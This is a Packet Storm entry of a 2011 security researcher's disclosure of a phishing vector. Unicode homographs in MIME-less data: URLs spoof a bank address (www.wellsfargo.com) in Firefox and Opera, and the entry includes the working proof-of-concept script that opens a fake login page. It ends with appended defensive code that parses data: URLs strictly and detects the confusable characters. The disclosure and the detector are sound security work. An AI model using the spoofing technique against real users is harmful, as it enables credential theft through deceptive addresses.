ID PACKETSTORM:107710 Type packetstorm Reporter Michal Zalewski Modified 2011-12-09T00:00:00
Description
/*
From: Michal Zalewski <lcamtuf@coredump.cx>
Date: Fri, 9 Dec 2011 11:04:22 -0800
Subject: the week of silly PoCs continues: data://www.mybank.com/
Just another short note... this is a somewhat compelling and entirely
unnecessary phishing opportunity - and a tiny symptom of the mess with
URL handling.
Firefox and Opera allow you to omit MIME type in data: URLs, possibly
put random garbage into that section, and still get a valid HTML
document. This is a natural extension of how the Content-Type header
is handled in HTTP, but probably makes little or no sense here.
With the use of Unicode homographs, you can create fairly believable
URLs especially in Firefox:
http://lcamtuf.coredump.cx/switch/index2.html
The appearance may vary depending on your font selection; see
http://lcamtuf.coredump.cx/switch/reference.jpg for a sample capture.
If you know the special role of "data:", this won't fool you. But most
browser users don't, even if they grasp the basics of URL syntax to
begin with (of course, that part itself is not true in all too many
cases).
PS. It is probably better known that a less convincing variant of this
can be achieved with javascript: URLs in MSIE and some other browsers.
/mz
*/
Exploit:
<script>
var spaces = '\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003';
var bank_html =
'<html><title>Beaver Peak Banking and BBQ</title>' +
'<link rel="shortcut icon" href="http://lcamtuf.coredump.cx/ffabout/lock.ico">' +
'<img src="http://banking.beaver-peak.us/banking_interface/beaver-peak.jpg" style="float: left; margin-right: 10px">' +
'<font size=+3 color=steelblue><b>Beaver Peak Banking and BBQ</b></font><br>' +
'<i>"Best steaks in town!"</i> -- Creek and Brook Daily<br clear="all"><p> ' +
'<p><b>Please login to our secure banking system:</b><p><table><tr><td>Login:</td><td><input type=text></td></tr><tr>' +
'<td>Password:</td><td><input type=password></td></tr></table><p><input type=submit value="Log in!">' +
'<p><div style="border-width: 1px 0 0 0;border-color:steelblue; border-style:solid">' +
'<font color=gray size=-1>Member FDIC. FDA certified. Truck parking available.</font></div>';
var w;
function dostuff() {
  if (navigator.userAgent.indexOf('Safari/') != -1)
    alert('Sorry, no worky in this browser.');
  if (navigator.userAgent.indexOf('; MSIE') != -1) {
    w = window.open('javascript://www.wellsfargo.com/' + spaces + '%0a"<title>Beaver Peak Banking and BBQ</title>"', 'target');
    setTimeout('w.document.body.innerHTML = bank_html', 100);
  } else if (navigator.userAgent.indexOf('Opera/') != -1) {
    w = window.open('data:,//www.wellsfargo.com/', 'target');
    setTimeout('w.document.body.innerHTML = bank_html', 100);
  } else {
    w = window.open('data:\u2044\u2044www.wellsfargo.com\u2044' + spaces + ',' + escape(bank_html), 'target');
  }
}
</script>
<h3>You sniff MIME / assume HTML on <i>what</i>?</h3>
Just a delicious and completely unnecessary vector for phishing. The most convincing version of this is for Firefox,
thanks to Unicode homographs (YMMV, but here's a
<a href="reference.jpg">reference rendering</a>);
Opera comes second, and the MSIE variant (using a different approach) is barely of
any interest.
<p>
Safari and Chrome avoid the problem by not doing MIME sniffing or
presuming HTML on <code>data:</code> URLs (and by subsequently giving them a unique origin). The MSIE variant is
prevented in said browsers by not showing <code>javascript:"..."</code> URLs in the address bar.
<p>
<input type=submit onclick="dostuff()" value="Show me the thing"><p>
<p>
PS. If you combine this with my <a href="http://lcamtuf.coredump.cx/switch/">earlier PoC</a> to seamlessly replace http://www.trustedsite.com with
data://www.trustedsite.com, things get slightly more interesting.
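The behaviour the page credits to Safari and Chrome, never sniffing or presuming HTML on a data: URL, comes down to parsing the mediatype strictly per RFC 2397 and treating an empty one as text/plain. The JavaScript below is an added example, not part of Zalewski's PoC and not any browser's code; the confusable-character list and the sample URLs are constructed here, with the sample shapes mirroring the Opera and Firefox branches of dostuff() above so a URL filter or log reviewer can see why they should never be rendered as HTML.

```javascript
// Added example (not the PoC's code): strict RFC 2397 data: URL parsing that
// never guesses HTML, plus detection of the homographs the PoC relies on.
// Grammar: data:[<mediatype>][;base64],<data>
//   <mediatype> := [type "/" subtype] *( ";" attribute "=" value )
//   an omitted mediatype defaults to text/plain;charset=US-ASCII

// RFC 2045 token characters: printable ASCII without tspecials or whitespace.
const TOKEN_RE = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Constructed list of characters that mimic URL punctuation. The first two are
// the ones the PoC uses (fraction slash for "/", em space for padding).
const CONFUSABLES = new Map([
  ['\u2044', 'FRACTION SLASH'],
  ['\u2003', 'EM SPACE'],
  ['\u2215', 'DIVISION SLASH'],
  ['\uFF0F', 'FULLWIDTH SOLIDUS'],
  ['\u2002', 'EN SPACE'],
  ['\u00A0', 'NO-BREAK SPACE'],
]);

// Count each confusable present in s; one entry per distinct character.
function findConfusables(s) {
  const counts = new Map();
  for (const ch of s) {
    if (CONFUSABLES.has(ch)) counts.set(ch, (counts.get(ch) || 0) + 1);
  }
  return [...counts].map(([ch, count]) => ({
    codePoint: 'U+' + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, '0'),
    name: CONFUSABLES.get(ch),
    count,
  }));
}

// Strict parse of the part before the comma. Anything that is not a valid
// mediatype makes the URL invalid instead of being sniffed into HTML.
function parseDataUrl(url) {
  const r = { ok: false, mediaType: null, params: {}, base64: false, confusables: [], reason: null };
  if (!/^data:/i.test(url)) { r.reason = 'not a data: URL'; return r; }
  const comma = url.indexOf(',');
  if (comma < 0) { r.reason = 'missing comma between mediatype and data'; return r; }
  const header = url.slice(5, comma);
  r.confusables = findConfusables(header);
  if (/[^\x21-\x7E]/.test(header)) {           // non-ASCII or whitespace
    r.reason = 'non-ASCII or whitespace in mediatype';
    return r;
  }
  const segments = header.split(';');
  let type = segments.shift();                 // may be '' (RFC 2397 shorthand)
  if (segments.length && segments[segments.length - 1].toLowerCase() === 'base64') {
    r.base64 = true;
    segments.pop();
  }
  for (const seg of segments) {
    const eq = seg.indexOf('=');
    const attr = eq > 0 ? seg.slice(0, eq).toLowerCase() : '';
    const value = eq > 0 ? seg.slice(eq + 1) : '';
    const quoted = /^"[^"\\]*(?:\\.[^"\\]*)*"$/.test(value);
    if (!TOKEN_RE.test(attr) || !(TOKEN_RE.test(value) || quoted)) {
      r.reason = 'malformed parameter "' + seg + '"';
      return r;
    }
    r.params[attr] = quoted ? value.slice(1, -1) : value;
  }
  if (type === '') {
    type = 'text/plain';                       // RFC 2397 default, never HTML
    if (!('charset' in r.params)) r.params.charset = 'US-ASCII';
  } else {
    const parts = type.split('/');
    if (parts.length !== 2 || !TOKEN_RE.test(parts[0]) || !TOKEN_RE.test(parts[1])) {
      r.reason = 'malformed type/subtype "' + type + '"';
      return r;
    }
    type = type.toLowerCase();
  }
  r.mediaType = type;
  r.ok = true;
  return r;
}

// The no-sniffing policy: HTML only when the mediatype says text/html.
function shouldRenderAsHtml(url) {
  const p = parseDataUrl(url);
  return p.ok && p.mediaType === 'text/html';
}

// Constructed samples shaped like the PoC's Opera and Firefox URLs, plus an
// honest text/html URL for comparison.
const SAMPLES = {
  opera: 'data:,//www.wellsfargo.com/',
  firefox: 'data:\u2044\u2044www.wellsfargo.com\u2044' + '\u2003'.repeat(40) + ',' +
           encodeURIComponent('<html><title>x</title>'),
  honest: 'data:text/html;charset=utf-8,' + encodeURIComponent('<p>hello</p>'),
};

// Summarise each sample: would it render as HTML, and why or why not?
function report() {
  const out = {};
  for (const [label, url] of Object.entries(SAMPLES)) {
    const p = parseDataUrl(url);
    out[label] = { html: shouldRenderAsHtml(url), mediaType: p.mediaType, reason: p.reason,
                   confusables: p.confusables.map(c => c.name + ' x' + c.count) };
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) console.log(JSON.stringify(report(), null, 2));
```

Run with node: the Opera-shaped URL parses to text/plain;charset=US-ASCII and is not HTML, the Firefox-shaped one is rejected outright with FRACTION SLASH and EM SPACE reported, and only the honest text/html URL passes. The same check, applied to a URL before it is opened or logged, is the defender-side counterpart of the browser behaviour the page describes.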
Title JavaScript Switcharoo Proof Of Concept 2 Bulletin family exploit Published 2011-12-09T00:00:00 Href https://packetstormsecurity.com/files/107710/JavaScript-Switcharoo-Proof-Of-Concept-2.html Source https://packetstormsecurity.com/files/download/107710/whimsical-switch2.txt